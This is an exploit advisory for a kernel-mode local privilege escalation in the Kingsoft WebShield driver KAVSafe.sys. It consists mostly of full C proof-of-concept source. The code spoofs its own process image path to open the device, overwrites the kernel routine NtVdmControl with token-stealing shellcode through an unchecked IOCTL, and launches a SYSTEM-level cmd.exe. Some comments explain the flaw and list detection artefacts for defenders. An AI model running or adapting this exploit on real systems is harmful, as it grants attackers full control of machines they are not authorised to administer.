
Kingsoft WebShield KAVSafe.sys <= 2010.4.14.609(2010.5.23) Kernel Mode Local Priv Escalation



Kingsoft WebShield KAVSafe.sys <= 2010.4.14.609(2010.5.23) Kernel Mode Local Privilege Escalation Vulnerability
Kingsoft WebShield KAVSafe.sys <= 2010.4.14.609(2010.5.23) Kernel Mode Local Privilege Escalation Vulnerability




Kingsoft WebShield KAVSafe.sys <= 2010.4.14.609 (2010.5.23) Kernel Mode Local Privilege Escalation Vulnerability

VULNERABLE PRODUCTS
Kingsoft WebShield <= 3.5.1.2 (2010.5.23)

Signature Date: 2010-5-23 2:33:54

and

KAVSafe.sys <= 2010.4.14.609
Signature Date: 2010-4-14 13:42:26

DETAILS:
KAVSafe.sys creates a device named \Device\KAVSafe and handles the DeviceIoControl request with IoControlCode = 0x830020d4, which can overwrite arbitrary kernel-module data.

EXPLOIT CODE:

/* Control code for the KAVSafe device. CTL_CODE(0x8300, 0x835, METHOD_BUFFERED,
 * FILE_ANY_ACCESS) evaluates to 0x830020D4, the IoControlCode named in the
 * DETAILS section above. FILE_ANY_ACCESS means the I/O manager applies no
 * access check of its own to this request; whatever validation of the
 * caller and of the buffer contents exists must live in the driver. */
#define IOCTL_HOTPATCH_KERNEL_MODULE CTL_CODE(0x8300 , 0x835 , METHOD_BUFFERED ,FILE_ANY_ACCESS)
/* Prototype of ntdll!NtQueryInformationProcess; main() resolves it at run
 * time with GetProcAddress rather than linking against it. */
typedef LONG (WINAPI *PNT_QUERY_INFORMATION_PROCESS)(
  HANDLE ProcessHandle,
  DWORD ProcessInformationClass,
  PVOID ProcessInformation,
  ULONG ProcessInformationLength,
  PULONG ReturnLength
    );
 =0D
/* Hand-copied ntdll structures that make up RTL_USER_PROCESS_PARAMETERS
 * below. They are not pulled from a DDK header, so their layout has to match
 * the running OS exactly: main() walks the live PEB through these types to
 * reach ImagePathName. */
typedef struct _STRING {
    USHORT Length;          // bytes in use, excluding any terminator
    USHORT MaximumLength;   // bytes available in Buffer
    PCHAR Buffer;
} STRING;
typedef STRING *PSTRING;
typedef struct _RTL_DRIVE_LETTER_CURDIR {
    USHORT Flags;
    USHORT Length;
    ULONG TimeStamp;
    STRING DosPath;
} RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR;
typedef struct _UNICODE_STRING {
    USHORT Length;          // bytes in use (main() sets it from wcslen * sizeof(WCHAR))
    USHORT MaximumLength;   // bytes available in Buffer; never consulted by main()
    PWSTR  Buffer;
} UNICODE_STRING;
typedef UNICODE_STRING *PUNICODE_STRING;
typedef const UNICODE_STRING *PCUNICODE_STRING;
#define RTL_MAX_DRIVE_LETTERS 32
#define RTL_DRIVE_LETTER_VALID (USHORT)0x0001
typedef struct _CURDIR {
    UNICODE_STRING DosPath;
    HANDLE Handle;
} CURDIR, *PCURDIR;
/* Process parameter block referenced from the PEB. main() touches only
 * ImagePathName (swapped for a different path while the device is opened,
 * then restored); every member before it is declared purely so that
 * ImagePathName lands at the correct offset. The trailing field comments
 * are carried over from the original listing. */
typedef struct _RTL_USER_PROCESS_PARAMETERS {
    ULONG MaximumLength;
    ULONG Length;
    ULONG Flags;
    ULONG DebugFlags;
    HANDLE ConsoleHandle;
    ULONG  ConsoleFlags;
    HANDLE StandardInput;
    HANDLE StandardOutput;
    HANDLE StandardError;
    CURDIR CurrentDirectory;        // ProcessParameters
    UNICODE_STRING DllPath;         // ProcessParameters
    UNICODE_STRING ImagePathName;   // ProcessParameters -- the field main() rewrites
    UNICODE_STRING CommandLine;     // ProcessParameters
    PVOID Environment;              // NtAllocateVirtualMemory
    ULONG StartingX;
    ULONG StartingY;
    ULONG CountX;
    ULONG CountY;
    ULONG CountCharsX;
    ULONG CountCharsY;
    ULONG FillAttribute;
    ULONG WindowFlags;
    ULONG ShowWindowFlags;
    UNICODE_STRING WindowTitle;     // ProcessParameters
    UNICODE_STRING DesktopInfo;     // ProcessParameters
    UNICODE_STRING ShellInfo;       // ProcessParameters
    UNICODE_STRING RuntimeData;     // ProcessParameters
    RTL_DRIVE_LETTER_CURDIR CurrentDirectores[ RTL_MAX_DRIVE_LETTERS ];
} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;
/* Truncated PEB: only the leading members up to ProcessParameters are
 * declared, which is all main() dereferences. The field comments are the
 * original listing's. */
typedef struct _PEB {
    BOOLEAN InheritedAddressSpace;      // These four fields cannot change unless the
    BOOLEAN ReadImageFileExecOptions;   //
    BOOLEAN BeingDebugged;              //
    BOOLEAN SpareBool;                  //
    HANDLE Mutant;                      // INITIAL_PEB structure is also updated.
    PVOID ImageBaseAddress;
    PVOID Ldr;
    struct _RTL_USER_PROCESS_PARAMETERS *ProcessParameters;   // only member used by main()
} PEB, *PPEB;
typedef LONG KPRIORITY;
/* Reply for NtQueryInformationProcess class 0 (ProcessBasicInformation).
 * main() casts PebBaseAddress to PPEB; nothing else in it is read. */
typedef struct _PROCESS_BASIC_INFORMATION {
    LONG ExitStatus;
    PVOID PebBaseAddress;
    ULONG_PTR AffinityMask;
    KPRIORITY BasePriority;
    ULONG_PTR UniqueProcessId;
    ULONG_PTR InheritedFromUniqueProcessId;
} PROCESS_BASIC_INFORMATION,*PPROCESS_BASIC_INFORMATION;
/* One entry of the NtQuerySystemInformation class 0xb (SystemModuleInformation)
 * reply. main() reads only ImageName of the first entry. */
typedef struct {
    ULONG   Unknown1;
    ULONG   Unknown2;
    PVOID   Base;
    ULONG   Size;
    ULONG   Flags;
    USHORT  Index;
    USHORT  NameLength;
    USHORT  LoadCount;
    USHORT  PathLength;
    CHAR    ImageName[256];   // full path; main() keeps the part after the last '\'
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;

/* Single-entry reply buffer. main() passes sizeof(sysmod), so at most one
 * module is returned, and that first entry is treated as the kernel image
 * (an assumption of the PoC; the page does not state it). */
typedef struct {
    ULONG   Count;
    SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} X_SYSTEM_MODULE_INFORMATION, *PX_SYSTEM_MODULE_INFORMATION;
/* Prototype of ntdll!NtQuerySystemInformation, resolved with GetProcAddress. */
typedef LONG (WINAPI *PNT_QUERY_SYSTEM_INFORMATION) (
   LONG SystemInformationClass,
 PVOID SystemInformation,
   ULONG SystemInformationLength,
   PULONG ReturnLength
    );

/* Pseudo-handle meaning "the calling process" (same value GetCurrentProcess() returns). */
#define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 )
/* ntdll!NtVdmControl: two stack arguments. The in-kernel routine of the same
 * name is what main() asks the driver to overwrite, and the `ret 8` at the
 * end of R0ShellCodeXP is what makes the replacement honour this calling
 * convention. */
typedef LONG (WINAPI *PNT_VDM_CONTROL) (
   ULONG Service,
   PVOID ServiceData
    );
/* Kernel-mode payload for Windows XP (the "XP" suffix and the absolute address
 * 0xffdff124 tie it to that kernel's layout). It is never executed in user
 * mode: main() copies its raw bytes into the IOCTL buffer at offset 0x48 and
 * reports their length as (ULONG)NopNop - (ULONG)R0ShellCodeXP. The function
 * therefore must stay naked (no compiler prologue/epilogue) and must be
 * immediately followed by NopNop in the compiled image; any restructuring
 * changes the bytes that get sent.
 *
 * What the listing does, read literally: load the pointer stored at
 * 0xffdff124, take the pointer at +0x220 from it as the "current" entry,
 * then walk a linked list (link at +0x88, adjusted back to the containing
 * entry) until an entry whose ULONG at +0x84 equals 4, and copy that entry's
 * value at +0xc8 over the same field of the current entry. 4 is the id of the
 * System process on NT, so the shape is "copy one field from PID 4 into the
 * caller's entry"; which structures these offsets belong to is not stated on
 * the page and is only as valid as the specific XP build they were taken
 * from. The walk has no iteration bound -- if no entry matches it spins
 * forever at ring 0. `ret 8` pops two arguments, matching the
 * two-parameter NtVdmControl prototype this code is patched over. */
VOID __declspec(naked) R0ShellCodeXP()
{
    __asm
    {
        mov eax,0xffdff124
        mov eax,[eax]
        mov esi ,dword ptr[eax+0x220]
        mov eax,esi
    searchxp:
        mov eax,dword ptr[eax+0x88]
        sub eax,0x88
        mov edx,dword ptr[eax+0x84]
        cmp edx,4
        jnz searchxp
        mov eax,dword ptr[eax+0xc8]
        mov dword ptr[esi + 0xc8] , eax
        ret 8
    }
}
/* Positional sentinel; never called. main() uses (ULONG)NopNop -
 * (ULONG)R0ShellCodeXP as the byte length of the preceding function, so this
 * definition has to remain the next one after R0ShellCodeXP, and that
 * arithmetic only holds when the compiler emits the two back to back. */
VOID NopNop()
{
    fputs("nop!\n", stdout);
}
 =0D
#include "malloc.h"=0D
/* PoC entry point. The sequence, as written below:
 *   1. read the product install directory from
 *      HKLM\SOFTWARE\Kingsoft\KSWSVC\ProgramPath and append \kavinst.exe;
 *   2. rewrite this process's own PEB ImagePathName to that path while
 *      opening \\.\KAVSafe, then put the original bytes back;
 *   3. get the kernel image's file name, map that file with LoadLibrary and
 *      compute the RVA of its NtVdmControl export;
 *   4. send IOCTL_HOTPATCH_KERNEL_MODULE with a buffer holding a module name,
 *      that RVA, a byte count and the bytes of R0ShellCodeXP;
 *   5. call ntdll!NtVdmControl(0,0) so the system call reaches the patched
 *      kernel routine, then WinExec("cmd.exe").
 *
 * Reading it as a defender: step 2 strongly suggests the driver admits
 * callers based on their self-reported image path (inferred from the
 * spoof/restore bracketing CreateFile; the page does not say so). That
 * string sits in user-writable process memory and is not a trust boundary.
 * The control code is FILE_ANY_ACCESS, so the I/O manager performs no access
 * check; authorisation and validation of module name, offset and length all
 * have to happen in the driver's handler, and user-supplied bytes must never
 * be written over kernel code at all. Artefacts visible in this listing:
 * a handle to \Device\KAVSafe opened with only FILE_READ_ATTRIBUTES, control
 * code 0x830020d4 on that handle, and a subsequent NtVdmControl call from the
 * same process.
 *
 * Every failure path prints a message, waits for Enter and returns 0.
 * Pointer arithmetic goes through ULONG casts throughout: 32-bit-only code. */
int main(int argc, char* argv[])
{

    printf("KSWebShield KAVSafe.sys <= 2010,04,14,609\n"
    "Kernel Mode Privilege Escalation Vulnerability Proof-of-Concept\n"
    "2010-5-23\n"
    "By Lincoin \n\nPress Enter");
    HKEY hkey ;
    WCHAR InstallPath[MAX_PATH];
    DWORD datatype ;
    DWORD datasize = MAX_PATH * sizeof(WCHAR);   // in: bytes available; out: bytes written
    ULONG oldlen ;                               // saved ImagePathName.Length
    PVOID pOldBufferData = NULL ;                // saved ImagePathName bytes

    // Step 1: install directory from the registry, used as-is.
    if (RegOpenKey(HKEY_LOCAL_MACHINE , "SOFTWARE\\Kingsoft\\KSWSVC", &hkey) == ERROR_SUCCESS)
    {
        if (RegQueryValueExW(hkey , L"ProgramPath" , NULL , &datatype , (LPBYTE)InstallPath , &datasize) != ERROR_SUCCESS)
        {
            RegCloseKey(hkey);
            printf("KSWebShield not installed\n");
            getchar();
            return 0 ;
        }

        RegCloseKey(hkey);
    }
    else
    {
        printf("KSWebShield not installed\n");
        getchar();
        return 0 ;
    }
    // No room check: nothing guarantees the registry value is NUL-terminated
    // or short enough for the 12 extra characters plus terminator to fit.
    wcscat(InstallPath , L"\\kavinst.exe");


    PROCESS_BASIC_INFORMATION pbi ;

    PNT_QUERY_INFORMATION_PROCESS pNtQueryInformationProcess ;
    pNtQueryInformationProcess = (PNT_QUERY_INFORMATION_PROCESS)GetProcAddress(GetModuleHandle("ntdll.dll" ) , "NtQueryInformationProcess");
    // Class 0 = ProcessBasicInformation. Neither the GetProcAddress result
    // nor the returned status is checked; pbi is used regardless.
    pNtQueryInformationProcess(NtCurrentProcess() , 0 , &pbi , sizeof(pbi) , NULL);

    PPEB peb ;

    // Step 2: spoof ImagePathName in our own PEB for the duration of the open.
    // Length is overwritten first, so the "old" copy taken below is sized by
    // the NEW length, and that same count is copied back afterwards. This
    // stays inside the original buffer only if the new path is no longer
    // than the buffer's MaximumLength, which is never checked.
    peb = (PPEB)pbi.PebBaseAddress;
    oldlen = peb->ProcessParameters->ImagePathName.Length;
    peb->ProcessParameters->ImagePathName.Length = wcslen(InstallPath) * sizeof(WCHAR);
    pOldBufferData = malloc(peb->ProcessParameters->ImagePathName.Length);   // unchecked, never freed
    RtlCopyMemory(pOldBufferData,peb->ProcessParameters->ImagePathName.Buffer , peb->ProcessParameters->ImagePathName.Length);
    RtlCopyMemory(peb->ProcessParameters->ImagePathName.Buffer , InstallPath ,peb->ProcessParameters->ImagePathName.Length );
    // Opened with FILE_READ_ATTRIBUTES only. Because the control code is
    // declared FILE_ANY_ACCESS, the I/O manager asks for nothing more than
    // that before passing the DeviceIoControl below to the driver.
    HANDLE hdev = CreateFile("\\\\.\\KAVSafe" ,
    FILE_READ_ATTRIBUTES ,
    FILE_SHARE_READ ,
    0,
    OPEN_EXISTING ,
    0,
    0);

    if (hdev==INVALID_HANDLE_VALUE)
    {
        printf("cannot open device %u\n", GetLastError());
        getchar();
        return 0 ;
    }
    // Restore the original image path bytes and length.
    RtlCopyMemory(peb->ProcessParameters->ImagePathName.Buffer , pOldBufferData,peb->ProcessParameters->ImagePathName.Length);
    peb->ProcessParameters->ImagePathName.Length = (USHORT)oldlen ;

    // Step 3: file name of the first loaded module (class 0xb =
    // SystemModuleInformation), assumed to be the kernel image. The status
    // is ignored, and strrchr()+1 is applied without a NULL check.
    PNT_QUERY_SYSTEM_INFORMATION pNtQuerySystemInformation  ;
    pNtQuerySystemInformation = (PNT_QUERY_SYSTEM_INFORMATION)GetProcAddress(GetModuleHandle("ntdll.dll") , "NtQuerySystemInformation");
    X_SYSTEM_MODULE_INFORMATION sysmod ;
    HMODULE KernelHandle ;

    pNtQuerySystemInformation(0xb, &sysmod, sizeof(sysmod), NULL);
    // The kernel file is mapped into this process as an ordinary DLL purely
    // to read its export table.
    KernelHandle = LoadLibrary(strrchr(sysmod.Module[0].ImageName, '\\') + 1);
    if (KernelHandle == 0 )
    {
        printf("cannot load ntoskrnl!\n");
        getchar();
        return 0 ;
    }
    PVOID pNtVdmControl = GetProcAddress(KernelHandle , "NtVdmControl");

    if (pNtVdmControl == 0 )
    {
        printf("cannot find NtVdmControl!\n");
        getchar();
        return 0 ;
    }
    // Export address minus mapping base = RVA; the same RVA applies to the
    // copy of the image the kernel is running.
    pNtVdmControl = (PVOID)((ULONG)pNtVdmControl - (ULONG)KernelHandle  );

    printf("NtVdmControl = %08x" , pNtVdmControl );
    getchar();
    // Payload length is the distance to the next function in the image
    // (see the note on NopNop). Neither value is range-checked.
    ULONG ShellCodeSize = (ULONG)NopNop - (ULONG)R0ShellCodeXP;
    ULONG pShellCode = (ULONG)R0ShellCodeXP;   // unused


    // Step 4: request buffer, as laid out by the stores below:
    //   [0x00..0x40)  module name, NUL-padded (ModuleName is 68 bytes, but
    //                 bytes 64..71 are overwritten by the next two stores)
    //   [0x40]        ULONG  RVA of the routine to overwrite
    //   [0x44]        ULONG  byte count of the payload
    //   [0x48..)      payload bytes
    PVOID Data = malloc(0x48 + ShellCodeSize);   // unchecked, never freed

    CopyMemory((PVOID)((ULONG)Data + 0x48) , R0ShellCodeXP , ShellCodeSize);
    CHAR ModuleName[68]= "ntoskrnl.exe" ;
    RtlCopyMemory( Data , ModuleName , sizeof(ModuleName));
    *(ULONG*)((ULONG)Data + 64) = (ULONG)pNtVdmControl;
    *(ULONG*)((ULONG)Data + 68) = ShellCodeSize ;
    ULONG btr ;
    // No output buffer; btr only receives the bytes-returned count.
    if (!DeviceIoControl(hdev ,
    IOCTL_HOTPATCH_KERNEL_MODULE ,
    Data ,
    0x48 + ShellCodeSize ,
    NULL ,
    0,
    &btr , 0
    ))
    {
        printf("cannot device io control!%u\n" , GetLastError());
        getchar();
        return 0;
    }

    CloseHandle(hdev);

    // Step 5: the user-mode stub traps into whatever now sits at the patched
    // kernel address; both arguments are zero.
    PNT_VDM_CONTROL pR3NtVdmControl = (PNT_VDM_CONTROL)GetProcAddress(GetModuleHandle("ntdll.dll") , "NtVdmControl");
    pR3NtVdmControl(0,0);
    WinExec("cmd.exe" , SW_SHOW);
    printf("OK!\n ");

    getchar();

    return 0;
}
 =0D
 =0D
 =0D
      =0D
